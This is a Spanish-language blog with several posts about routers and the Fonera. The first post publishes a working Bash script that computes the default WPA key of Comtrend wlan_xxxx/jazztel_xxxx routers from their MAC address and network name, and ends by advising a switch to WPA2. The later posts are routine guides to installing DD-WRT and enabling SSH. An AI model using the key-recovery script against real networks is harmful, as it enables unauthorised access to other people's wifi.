sábado, 5 de febrero de 2011

WPA Ya no es segura!

Se ha publicado el algoritmo que hace posible conocer las claves por defecto usadas en los routers Comtrend que tienen como patrón el nombre de red wlan_xxxx y jaztel_xxxx.
Sus proveedores son Movistar y Jazztel

La casa Comtrend para obtener la clave WPA usa como patrón la MAC (bssid) del dispositivo i el nombre de la red (essid) combinado con un hash md5sum.

Os dejo el script en Bash que lo hace posible, lo he modificado un poco para que se entender mejor que es lo que hace:

1.- MAC: 64:68:0C:4F:C4:EF
2.- ESSID: wlan_C4EC


[CODIGO]

#!/bin/bash
echo
echo
echo "############### Default KEY's [WPA] wlan_xxxx i jazztel_xxxx #############"
echo
echo
if [ $# -ne 2 ]
then
echo "Usage: $0 "
echo
echo "Ejamplo: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi
HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
echo $HEAD " ### El nombre de la red - WLAN_ "

BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
echo $BSSID " ### La MAC del router sin puntos "

BSSIDP=$(echo -n "$BSSID" | cut -c-8)
echo $BSSIDP " ### La MAC del router sin los últimos 4 digitos "

KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo
echo " La clave es #####!! $KEY !!#####"
echo
[/CODIGO]

Ya veis que no hace falta ni auditar la red para saber cual es la clave.

Es muy recomendable, si os encontráis con esta tipo de redes en casa, cambiar a WPA2 y combinarlo con una buena clave de seguridad combinado letras (mayúsculas y minúsculas) con números y caracteres especiales.

Este algoritmo fue descubierto por el equipo de cifrados de www.seguridadwireless.net que decidieron no hacerlo público hasta que Comtrend pudiera rectificar.
Posteriormente des de http://www.forocoches.com/foro/ se ha dado con el.

viernes, 24 de octubre de 2008

Fonera en modo Cliente y Repetidor con DD-WRT

Aprovechando la versión final de DD-WRT v24 y por lo tanto mas estable que las anteriores, vamos a ver como configuramos fácilmente la Fonera para usarla como cliente o como repetidora de una señal Wifi.
Primero de todo tenemos que instalar el dd-wrt, podemos ver en entradas anteriores en el blog donde ya se explica.

Una vez instalado accedemos a la configuración web mediante la ip 192.168.1.1
DD-WRT tiene una interfaz web muy intuitiva y muy completa, por lo que podremos configurarlo casi todo desde la misma.

El usuario y contraseña por defecto es:
  • root - admin
Antes de nada podemos poner la interfaz web en castellano, para que nos sea mas facil entenderlo, vamos a:
  • administración --> Lenguaje --> Español

Lo segundo será configurar el rango de ip que utilizaremos para conectarnos a Internet. Nos vamos a:
  • Setup --> Tipo de conexion a internet --> Ip estatica

Aquí configuramos la ip con la que nos vamos a conectar al router, debe estar en el mismo rango. La puerta de enlace (ip del router conectado a internet) Su mascara de red y las DNS.



Aplicamos y grabamos configuración

Ahora vamos a asociarnos con el router o punto de acceso:
  • Estado --> Inalámbrico --> Inspección de sitios
Y nos unimos a la red que queremos conectar.

Automáticamente seremos trasladados a la pestaña


Aquí ponemos en:
  • modo inalámbrico --> Cliente
Los que tengáis dos antenas en la Fonera en donde pone Antena TX y RX, es donde pondréis la antena que mejor os convenga.

Aplicamos y grabamos configuración


Ahora solo falta la encriptación, que debe ser la misma clave que tenéis puesta en el router.
  • Inalámbrico --> Seguridad inalámbrica
En caso de que tengáis una clave WPA, no lo he probado, pero por lo que he leído no debería daros mas problemas.

Pero en caso de WEP esta versión tiene todavía un fallo que no han corregido, y es que desde la configuración web no quedan grabados los datos, por lo que hay que hacerlo desde consola.

Nos dirigimos a:
  • Administración --> Acceso remoto --> activamos SSH Management en el puerto 22
Nos conectamos con el Putty y escribimos:
  • nvram set ath0_key1=la-clave-en-hexadecimal
  • nvram commit
  • reboot
Una vez reiniciado, deberíamos tener acceso a Internet desde la Fonera, para ello podemos ir a la sección:

  • Administración --> Disgnósticos --> Comandos --> ping jmarcma.blogspot.com
Si obtenemos ping es que todo está correcto, de lo contrario habrá que revisar los pasos anteriores.

Ahora solo nos falta por configurar una nueva interface para que se pueda repetir la señal.
Volvemos a la pestaña Inalámbrico y añadimos una interfaz virtual.


Damos un nombre a la red o bien en caso de que no queramos que se muestre el essid desactivamos.
  • Broadcast SSID Inalámbrico
Modo Inalámbrico:
  • AP
Aplicamos y grabamos configuración

Por último la encriptación, debemos hacer el mismo paso que hemos echo antes y nos conectamos con el putty:
  • nvram set ath0.1_key1=la-clave-en-hexadecimal
  • nvram commit
  • reboot

Podemos configurar el rango de ip's con el que trabajaŕa el wifi, tambien podemos activar el DHCP en:
  • Setup --> Setup básico --> Setup de RED
Ahora deberia aparecer una nueva señal Wifi con el nombre que hemos dado anteriormente y conectado a Internet.



miércoles, 22 de octubre de 2008

Instalar DD-WRT v24 Final en la Fonera


Necesitaremos:

1- El firmware DD-WRT v24 Final Sp1, que lo podemos bajar de aquí.

2- Un cliente tftp server de aquí

3- El Putty

4- La fonera con el redbot instalado, o bien un cable serie para la fonera. Yo prefiero el cable serie, ya que si la cagamos en algún momento este nos puede salvar.


Configuramos nuestra tarjeta de red con la siguiente ip: 192.168.1.3

Abrimos el tftp Server con la conexión local.

Nos conectamos con el putty a la ip de la fonera 192.168.1.1 mediante el puerto 9000, si lo hacemos con el redbot activado. Si lo hacemos desde el cable serie debemos usar la siguiente configuración: 9600 - 8 - 1 – none.


Una vez dentro de la consola debemos establecer la ip que nos va a servirlos archivos i empezamos con la instalación:


ip_address –l 192.168.1.254/24 –h 192.168.1.3

fis init

load –r –v –b 0x80041000 linux.bin

fis create linux (esta parte va a durar bastante ya que instalará el firmware)


Una vez ha finalizado debemos configurar el script que de arranque de la fonera para que nos lea el sistema.

Debemos ir respondiendo o escribiendo a las diferentes preguntas i pulsando enter al finalizar:


fconfig

Run script at boot: true
Boot script:
.. fis load -l vmlinux.bin.l7
.. exec
Enter script, terminate with empty line
>> fis load -l linux
>> exec
>>
Boot script timeout (1000ms resolution): 10
Use BOOTP for network configuration: false
Gateway IP address:
Local IP address:
192.168.1.254
Local IP address mask:
255.255.255.0
Default server IP address:
Console baud rate: 9600

GDB connection port: 9000
Force console for special debug messages:
false
Network debug at boot time:
false
Update RedBoot non-volatile configuration - continue (y/n)? y
… Erase from 0xa87e0000-0xa87f0000:
… Program from 0×80ff0000-0×81000000 at 0xa87e0000: .
RedBoot>reset


Ahora se reinicia la fonera y ya tenemos instalado el DD-wrt v24 final Sp1, para acceder a la configuración web la ip es 192.168.1.1

sábado, 31 de mayo de 2008

Activar ssh en la Fonera

Lo primero de todo es probar con el boton del reset haber si hay suerte y te vuelve a la version enterior que tansolo abria que ejecutar el dropbear

De no ser así:

Configuras tu targeta de red:
  • Con la direccion 169.254.255.x
  • La puerta de enlace: 169.254.255.1
Tienes "engañar" al router para que te de acceso por ssh y poner static ip y ponerle las dns de FON.
Entras por web y te dirijes a Avanced --> Internet conection y configuras un rango de ip's para el wifi, por ejemplo:
  • IP: 192.168.0.3
  • SM: 255.255.255.0
  • P.E: 192.168.0.1
  • DNS: 88.198.165.155
Y guardas.

Luego con la fonera conectada al router con internet, reinicias y te conectas por Wifi con las ip's que hemos configurado antes.
Te conectas con el Putty con la ip 169.254.255.1 por ssh y Voilà ya estas conectado por ssh, entras con admin admin.
Puedes canviar el pasword poniedo: passwd root

Ahora hay que ejecutar dropbear para que cuando se reinicie puedas volver a entrar por ssh.

Lo ultimo que falta:
  1. ln -s /etc/init.d/dropbear /etc/init.d/S50dropbear
  2. vi /etc/firewall.user (y buscas las lineas que hacen referencia al puerto 22 y las comentas)
  3. vi /bin/thinclient (y comentas la ultima linea creo que es y la comentasdebe quedar así # ./tmp/.thinclient
Para poder editar en el editor VI apretas la i
Para comentar usas el caracter #
Y para salir y guardar los cambios ESC :wq

Para la versión 7.1.1 r1 solo ejecutar el Dropbear y añadir las lineas comentadas antes.